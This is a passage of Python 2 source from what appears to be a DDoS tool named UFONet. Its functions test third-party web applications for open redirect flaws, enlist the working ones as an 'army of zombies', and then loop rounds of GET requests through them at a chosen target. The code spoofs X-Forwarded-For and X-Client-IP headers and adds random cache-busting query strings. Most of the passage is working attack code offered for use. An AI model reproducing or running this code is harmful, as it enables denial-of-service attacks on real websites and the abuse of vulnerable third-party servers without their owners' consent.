  1406.             external_service = "http://www.downforeveryoneorjustme.com/"
  1407.             if options.target.startswith('https://'): # fixing downforeveryoneorjustme url prefix problems
  1408.                 options.target = options.target.replace('https://','http://')
  1409.             external = external_service + options.target
  1410.             c.setopt(pycurl.URL, external) # external HEAD check before to attack
  1411.             c.setopt(pycurl.NOBODY, 0) # use GET
  1412.         if self.attack_mode == True:
  1413.             if options.place:
  1414.             # use zombie's vector to connect to a target's place and add a random query to evade cache
  1415.                 random_name_hash = random.randint(1, 100000000)
  1416.                 random_hash = random.randint(1, 100000000)
  1417.                 if options.place.endswith("/"):
  1418.                     options.place = re.sub('/$', '', options.place)
  1419.                 if options.place.startswith("/"):
  1420.                     #print options.place
  1421.                     if "?" in options.place:
  1422.                         url_attack = zombie + options.target + options.place + "&" + str(random_name_hash) + "=" + str(random_hash)
  1423.                     else:
  1424.                         url_attack = zombie + options.target + options.place + "?" + str(random_name_hash) + "=" + str(random_hash)
  1425.                 else:
  1426.                     if "?" in options.place:
  1427.                         url_attack = zombie + options.target + "/" + options.place + "&" + str(random_name_hash) + "=" + str(random_hash)
  1428.                     else:
  1429.                         url_attack = zombie + options.target + "/" + options.place + "?" + str(random_name_hash) + "=" + str(random_hash)
  1430.             else:                                    
  1431.                 url_attack = zombie + options.target # Use zombie vector to connect to original target url
  1432.             #print url_attack
  1433.             print "Payload:", url_attack
  1434.             c.setopt(pycurl.URL, url_attack) # GET connection on target site
  1435.             c.setopt(pycurl.NOBODY, 0)  # use GET
  1436.         fakeheaders = ['Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg', 'Connection: Keep-Alive', 'Content-type: application/x-www-form-urlencoded; charset=UTF-8', 'Cache-control: no-cache', 'Pragma: no-cache', 'Pragma-directive: no-cache', 'Cache-directive: no-cache', 'Expires: 0'] # set fake headers (important: no-cache)
  1437.         c.setopt(pycurl.FOLLOWLOCATION, 1) # set follow redirects
  1438.         c.setopt(pycurl.MAXREDIRS, 10) # set max redirects
  1439.         c.setopt(pycurl.SSL_VERIFYHOST, 0) # don't verify host
  1440.         c.setopt(pycurl.SSL_VERIFYPEER, 0) # don't verify peer
  1441.         c.setopt(pycurl.SSLVERSION, pycurl.SSLVERSION_SSLv3) # sslv3
  1442.         c.setopt(pycurl.COOKIEFILE, '/dev/null') # black magic
  1443.         c.setopt(pycurl.COOKIEJAR, '/dev/null') # black magic
  1444.         c.setopt(pycurl.FRESH_CONNECT, 1) # important: no cache!
  1445.         if options.xforw: # set x-forwarded-for
  1446.             generate_random_xforw = RandomIP()
  1447.             xforwip = generate_random_xforw._generateip('')
  1448.             xforwfakevalue = ['X-Forwarded-For: ' + str(xforwip)]
  1449.             fakeheaders = fakeheaders + xforwfakevalue
  1450.         if options.xclient: # set x-client-ip
  1451.             generate_random_xclient = RandomIP()
  1452.             xclientip = generate_random_xclient._generateip('')
  1453.             xclientfakevalue = ['X-Client-IP: ' + str(xclientip)]
  1454.             fakeheaders = fakeheaders + xclientfakevalue
  1455.         if options.host: # set http host header
  1456.             host_fakevalue = ['Host: ' + str(options.host)]
  1457.             fakeheaders = fakeheaders + host_fakevalue
  1458.         c.setopt(pycurl.HTTPHEADER, fakeheaders) # set fake headers
  1459.         b = StringIO.StringIO()
  1460.         c.setopt(pycurl.HEADERFUNCTION, b.write)
  1461.         h = StringIO.StringIO()
  1462.         c.setopt(pycurl.WRITEFUNCTION, h.write)
  1463.         if options.agent: # set user-agent
  1464.             c.setopt(pycurl.USERAGENT, options.agent)
  1465.         else:
  1466.             c.setopt(pycurl.USERAGENT, self.user_agent)
  1467.         if options.referer: # set referer
  1468.             c.setopt(pycurl.REFERER, options.referer)
  1469.         else:
  1470.             c.setopt(pycurl.REFERER, self.referer)
  1471.         if options.proxy: # set proxy
  1472.             c.setopt(pycurl.PROXY, options.proxy)
  1473.         else:
  1474.             c.setopt(pycurl.PROXY, '')
  1475.         if options.timeout: # set timeout
  1476.             c.setopt(pycurl.TIMEOUT, options.timeout)
  1477.             c.setopt(pycurl.CONNECTTIMEOUT, options.timeout)
  1478.         else:
  1479.             c.setopt(pycurl.TIMEOUT, 10)
  1480.             c.setopt(pycurl.CONNECTTIMEOUT, 10)
  1481.         if options.delay: # set delay
  1482.             self.delay = options.delay
  1483.         else:
  1484.             self.delay = 0
  1485.         if options.retries: # set retries
  1486.             self.retries = options.retries
  1487.         else:
  1488.             self.retries = 1
  1489.         try: # try to connect
  1490.             c.perform()
  1491.             time.sleep(self.delay)
  1492.             self.connection_failed = False
  1493.         except Exception, e: # try retries
  1494.             #print str(e)
  1495.             for count in range(0, self.retries):
  1496.                 time.sleep(self.delay)
  1497.                 try:
  1498.                     c.perform()
  1499.                     self.connection_failed = False
  1500.                 except:
  1501.                     self.connection_failed = True
  1502.         if self.head == True: # HEAD reply
  1503.             code_reply = c.getinfo(pycurl.HTTP_CODE)
  1504.             reply = b.getvalue()
  1505.             if options.verbose:
  1506.                 print "Reply:"
  1507.                 print "\n", reply
  1508.             return code_reply
  1509.         if self.external == True: # External reply
  1510.             external_reply = h.getvalue()
  1511.             if options.verbose:
  1512.                 print "Reply:"
  1513.                 print "\n", external_reply
  1514.             return external_reply
  1515.         if self.payload == True: # Payloads reply
  1516.             payload_reply = h.getvalue()
  1517.             if options.verbose:
  1518.                 print "Reply:"
  1519.                 print "\n", payload_reply
  1520.             return payload_reply
  1521.         if self.attack_mode == True: # Attack mode reply
  1522.             attack_reply = h.getvalue()
  1523.             if options.verbose:
  1524.                 print "Reply:"
  1525.                 print "\n", attack_reply
  1526.             return attack_reply
  1527.  
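    # testing() makes two passes over the list: a HEAD request keeps only hosts answering
    # 200/301/302/401/403/405, and an Open Redirect probe then marks a zombie as ready
    # only if the response body contains the injected http://www.google.es payload.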
  1528.     def testing(self, zombies):
  1529.         # test Open Redirect vulnerabilities on webapps and show statistics
  1530.         # HTTP HEAD check
  1531.         print ("Are 'they' alive? :-) (HEAD Check):")
  1532.         print '='*35
  1533.         num_active_zombies = 0
  1534.         num_failed_zombies = 0
  1535.         active_zombies = []
  1536.         army = 0
  1537.         print "Trying:", len(zombies)
  1538.         print '-'*21
  1539.         for zombie in zombies:
  1540.             zombie = str(zombie)
  1541.             t = urlparse(zombie)
  1542.             if zombie.startswith("http://") or zombie.startswith("https://"):
  1543.                 # send HEAD connection
  1544.                 self.head = True
  1545.                 code_reply = str(self.connect_zombies(zombie))
  1546.                 self.head = False
  1547.                 if code_reply == "200" or code_reply == "302" or code_reply == "301" or code_reply == "401" or code_reply == "403" or code_reply == "405":
  1548.                     name_zombie = t.netloc
  1549.                     print "Zombie:", name_zombie
  1550.                     print "Status: Ok ["+ code_reply + "]"
  1551.                     num_active_zombies = num_active_zombies + 1
  1552.                     active_zombies.append(zombie)
  1553.                 elif code_reply == "404":
  1554.                     print "Zombie:", t.netloc
  1555.                     print "Status: Not Found ["+ code_reply + "]"
  1556.                     num_failed_zombies = num_failed_zombies + 1
  1557.                 else:
  1558.                     print "Zombie:", t.netloc, zombie
  1559.                     print "Status: Not Allowed ["+ code_reply + "]"
  1560.                     num_failed_zombies = num_failed_zombies + 1
  1561.             else:
  1562.                 if self.options.verbose:
  1563.                     print "Reply:", "\n\nNothing!!!!!\n"
  1564.                 print "Zombie:", zombie
  1565.                 print "Status: Malformed!"
  1566.                 num_failed_zombies = num_failed_zombies + 1
  1567.             print '-'*10
  1568.         print '='*18
  1569.         print "OK:", num_active_zombies, "Fail:", num_failed_zombies
  1570.         print '='*18
  1571.         if num_active_zombies == 0:
  1572.             print "\n[INFO] - No zombies are active!\n"
  1573.             return #sys.exit(2)
  1574.         print '='*22
  1575.         # check url parameter vectors
  1576.         print ("Checking for payloads:")
  1577.         print '='*22
  1578.         print "Trying:", num_active_zombies
  1579.         print '-'*21
  1580.         zombies_ready = []
  1581.         num_waiting_zombies = 0
  1582.         num_disconnected_zombies = 0
  1583.         for zombie in active_zombies:
  1584.             zombie = str(zombie)
  1585.             t = urlparse(zombie)
  1586.             name_zombie = t.netloc
  1587.             payload_zombie = zombie
  1588.             print "Vector:", payload_zombie
  1589.             self.payload = True
  1590.             try:
  1591.                 payload_reply = str(self.connect_zombies(zombie))
  1592.             except:
  1593.                 payload_reply = ""
  1594.             self.payload = False
  1595.             if "http://www.google.es" in payload_reply: #Open Redirect reply
  1596.                 num_waiting_zombies = num_waiting_zombies + 1
  1597.                 print "Status:", "Waiting your orders..."
  1598.                 zombies_ready.append(zombie)
  1599.             else:
  1600.                 num_disconnected_zombies = num_disconnected_zombies + 1
  1601.                 print "Status:", "Not ready..."
  1602.             army = army + 1
  1603.             print '-'*10
  1604.         print '='*18
  1605.         print "OK:", num_waiting_zombies, "Fail:", num_disconnected_zombies
  1606.         print '='*18
  1607.         print '='*18
  1608.         # list of 'zombies' ready to attack
  1609.         print ("Army of 'zombies'")
  1610.         print '='*18
  1611.         num_active_zombie = 0
  1612.         for z in zombies_ready:
  1613.             t = urlparse(z)
  1614.             name_zombie = t.netloc
  1615.             num_active_zombie = num_active_zombie + 1
  1616.             if self.options.verbose:
  1617.                 print "Zombie [", num_active_zombie, "]:", name_zombie
  1618.         print '-'*18
  1619.         print "Total Army:", num_active_zombie
  1620.         print '-'*18
  1621.         # update 'zombies' list
  1622.         if num_active_zombie == 0:
  1623.             print "\n[INFO] - No zombies are active!\n"
  1624.         else:
  1625.             if not self.options.forceyes:
  1626.                 update_reply = raw_input("Wanna update your army (Y/n)")
  1627.                 print '-'*25
  1628.             else:
  1629.                 update_reply = "Y"
  1630.             if update_reply == "n" or update_reply == "N":
  1631.                 print "\nBye!\n"
  1632.                 return #sys.exit(2)
  1633.             else:
  1634.                 self.update_zombies(zombies_ready)
  1635.                 print "\n[INFO] - Botnet updated! ;-)\n"
  1636.  
  1637.     def attacking(self, zombies):
  1638.         # Perform a DDoS Web attack against a target, using Open Redirect vectors on third party machines (aka 'zombies')
  1639.         target = self.options.target
  1640.         if target.startswith("http://") or target.startswith("https://"):
  1641.             print "Attacking: ", target
  1642.             print '='*55, "\n"
  1643.             # send Open Redirect injection
  1644.             reply = self.injection(target, zombies)
  1645.         else:
  1646.             print "\n[Error] - Target url not valid!\n"
  1647.  
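    # injection() first checks that the target answers a HEAD request from here and asks
    # downforeveryoneorjustme.com for a second opinion; if either check passes it loops
    # rounds x zombies GET requests, shuffling the zombie order after every round and
    # counting a hit whenever the connection does not fail.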
  1648.     def injection(self, target, zombies):
  1649.         options = self.options
  1650.         head_check_here = False
  1651.         head_check_external = False
  1652.         print '='*21
  1653.         print "Round: 'Is target up?'"
  1654.         print '='*21
  1655.         # send HEAD connection
  1656.         self.head = True
  1657.         try:
  1658.             reply = self.connect_zombies(target)
  1659.             if reply:
  1660.                 print "From here: YES"
  1661.                 head_check_here = True
  1662.             else:
  1663.                 print "From Here: NO | WARNING: Check failed from your connection ;("
  1664.                 head_check_here = False
  1665.         except Exception:
  1666.             print "From Here: NO | WARNING: Check failed from your connection ;("
  1667.             head_check_here = False
  1668.         self.head = False
  1669.         print '-'*21
  1670.         # check target on third party service (ex: http://www.downforeveryoneorjustme.com)
  1671.         self.external = True
  1672.         try:
  1673.             external_reply = self.connect_zombies(target)
  1674.             if "It's just you" in external_reply: # parse external service for correct reply
  1675.                 print "From exterior: YES"
  1676.                 head_check_external = True
  1677.             else:
  1678.                 print "From exterior: NO | WARNING: Check failed from external services ;("
  1679.                 head_check_external = False
  1680.         except Exception:
  1682.             print "From exterior: NO | WARNING: Check failed from external services ;("
  1683.             head_check_external = False
  1684.         self.external = False
  1685.         print '-'*21, "\n"
  1686.         # ask for start the attack
  1687.         if head_check_here == True or head_check_external == True:
  1688.             if not self.options.forceyes:
  1689.                 start_reply = raw_input("Your target looks ONLINE! Wanna start a DDoS attack? (y/N)\n")
  1690.                 print '-'*25
  1691.             else:
  1692.                 start_reply = "Y"
  1693.             if start_reply == "y" or start_reply == "Y":
  1694.                 total_rounds = options.rounds # extract number of rounds
  1695.                 if not str(total_rounds).isdigit() or int(total_rounds) <= 0: # rounds must be a positive integer
  1696.                     total_rounds = 1
  1697.                 num_round = 1
  1698.                 num_hits = 0
  1699.                 num_zombie = 1
  1700.                 # start to attack the target with each zombie
  1701.                 zombies = self.extract_zombies() # extract zombies from file
  1702.                 total_zombie = len(zombies)
  1703.                 for i in range(0, int(total_rounds)):
  1704.                     for zombie in zombies:
  1705.                         print '='*45
  1706.                         print "Zombie:", num_zombie, "| Round:", num_round, "| Total Rounds:", total_rounds
  1707.                         print '='*45
  1708.                         t = urlparse(zombie)
  1709.                         name_zombie = t.netloc
  1710.                         self.attack_mode = True
  1711.                         print "Name:", name_zombie
  1712.                         attack_reply = self.connect_zombies(zombie)
  1713.                         if self.connection_failed == False:
  1714.                             print "Status: Hit!"
  1715.                             num_hits = num_hits + 1
  1716.                         else:
  1717.                             print "Status: Failed :("
  1718.                         num_zombie = num_zombie + 1
  1719.                         if num_zombie > total_zombie:
  1720.                             num_zombie = 1
  1721.                         print '-'*10
  1722.                     num_round = num_round + 1
  1723.                     shuffle(zombies) # shuffle zombie order for the next round
  1724.                 self.attack_mode = False # reset attack-mode flag
  1725.                 print '='*21
  1726.                 print "Total hits:", num_hits
  1727.                 print '='*21
  1728.                 print "\n[INFO] - Attack completed! ;-)\n"
  1729.             else:
  1730.                 print "\nBye!\n"
  1731.         else:
  1732.             print "Your target looks OFFLINE!?\n"
  1733.             print '-'*25
  1734.             print "\nBye!\n"
  1735.  
  1736. if __name__ == "__main__":
  1737.     app = UFONet()
  1738.     options = app.create_options()
  1739.     if options:
  1740.         app.set_options(options)
  1741.         app.run()